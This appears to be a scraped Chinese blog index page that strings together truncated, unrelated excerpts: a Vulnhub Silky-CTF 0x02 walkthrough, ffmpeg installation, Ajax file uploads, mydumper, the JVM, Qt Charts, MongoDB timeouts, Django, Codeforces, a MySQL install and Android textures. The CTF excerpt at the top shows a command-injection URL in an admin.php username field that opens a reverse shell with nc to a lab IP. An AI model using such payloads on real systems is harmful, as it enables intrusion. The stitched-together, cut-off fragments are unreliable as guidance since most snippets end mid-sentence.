靶机地址：
https://www.vulnhub.com/entry/silky-ctf-0x02,307/
主机扫描：

HTTP进行目录爆破


尝试SQL注入会被封掉IP
经过尝试发现username字段存在命令执行的漏洞

我们执行进行shell反弹
http://10.10.202.131/admin.php?username=nc%20-e%20/bin/bash%2010.10.2

Silky-CTF: 0x02 Vulhub Walkthrough

启动界面

主机层面扫描：
╰─ nmap -p1-65535 -sV -A 10.10.202.131
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-19 16:54 CSTNmap scan report for 10.10.202.131Host is up (0.00068s latency).Not shown: 65531 clo

WestWild: 1.1: Vulnhub Walkthorugh

从ffmpeg官网：http://ffmpeg.org/download.html 下载最新的ffmpeg安装包，然后通过如下命令解压：
解压 ffmpeg-*.tar.bz2  文件
进入解压的文件夹
wget https://ffmpeg.org/releases/ffmpeg-4.2.2.tar.bz2
tar jxf ffmpeg-4.2.2.tar.bz2
cd ffmpeg-4.2.2

Linux下安装ffmpeg，视频格式转换

上菜
file_put.html

<form action="" method="post" enctype="multipart/form-data">
{#  这里必须要请求头格式才能把上传文件的对象传过去  enctype="multipart/form-data"#}
    姓名 <input type="text" name="user">
    头像 <input type="f

Ajax（form表单文件上传、请求头之contentType、Ajax传递json数据、Ajax文件上传）

mysqldump单线程备份,很慢
恢复慢,一张表一张表恢复,
如果备份了100G的数据,想恢复其中一个表,做不到(所有的表都在一个文件里)
所以推荐使用mydumper备份
备份并行,基于行,即使一张表也能并行,好强呐
恢复也是并行
恢复的时候可以只恢复指定表
完美(__)

yum install -y  glib2-devel mysql-devel zlib-devel pcre-deve

浅析mydumper

JVM的组成分为整体组成部分和运行时数据区组成部分。
JVM的整体组成
JVM的整体组成可以分为4个部分：类加载器（Classloader）、运行时数据区（Runtime Data Area）、执行引擎（Execution Engine）和本地库接口（Native Interface）。
程序在执行之前，先要把Java代码编译成字节码（.class文件），JVM首先需要把字节码通过类加载器把文件加

jvm的组成入门

在Qt Charts发布之前， Qt比较著名两个画图插件是 qwt和Qcustom， 其中Qcustom较轻量，只需要在project 中包含qcustomplot.h 和 qcustomplot.cpp 几乎就可以使用。 相比Qcustom，qwt功能更为强大，但是它的安装十分麻烦，阻挡了很多人（包括我）的使用。 但是qwt只是对静态图表的表示非常不错，动态曲线性能并不突出。如果只是静态绘图，或

Qt Charts 动态实时绘制各种曲线图

环境
OS：CentOS 7.x
DB：MongoDB 3.6.12
集群模式：mongod-shard1 *3 + mongod-shard2 *3  +  mongod-conf-shard *3  +  mongos *3
业务错误日志
caused by :: NetworkInterfaceExceededTimeLimit: Operation time out on server *

MongoDB 集群 config server 查询超时导致 mongos 集群写入失败

django允许重写默认的user mode，提供了一个setting 值，来指向自定义的model，

AUTH_USER_MODEL = 'users.User'
#users是app名
#User是用户model


　　
Using a custom user model when starting a project
如果你开始一个新项目，设定一个自定义的user model是更值得推荐

django-替代为自定义的User model

B. Laurenty and Shoptime limit per test1 secondmemory limit per test256 megabytesinputstandard inputoutputstandard outputA little boy Laurenty has been playing his favourite game Nota for quite a whil

Codeforces Round #325 (Div. 2)        B. Laurenty and Shop       有规律的图   暴力枚举

步骤4、在“Developer Components(开发者部分)”上左键单击，选择“This feature, and all subfeatures, will be installed on local hard drive.”，即“此部分，及下属子部分内容，全部安装在本地硬盘上”。在上面的“MySQL Server(mysql服务器)”、“Client Programs(mysql客户端程

MySQL 5.0安装教程图解详细教程

首次界面打开加载的资源（如 贴图）会被缓存在内存中，再次打开界面由于内存中已有了资源 所以会更快。如何让首次打开界面会更快呢？
图片是否进行了有效的压缩。Android 平台下不带透明通道 优先使用ETC1，带透明通道优先使用ETC2。如果显示质量无法达到要求 可以使用RGBA16，最后才使用RGBA32.
正确的优先使用顺序是 ETC1 > ETC2 > RGBA16 > RGBA32.
另外针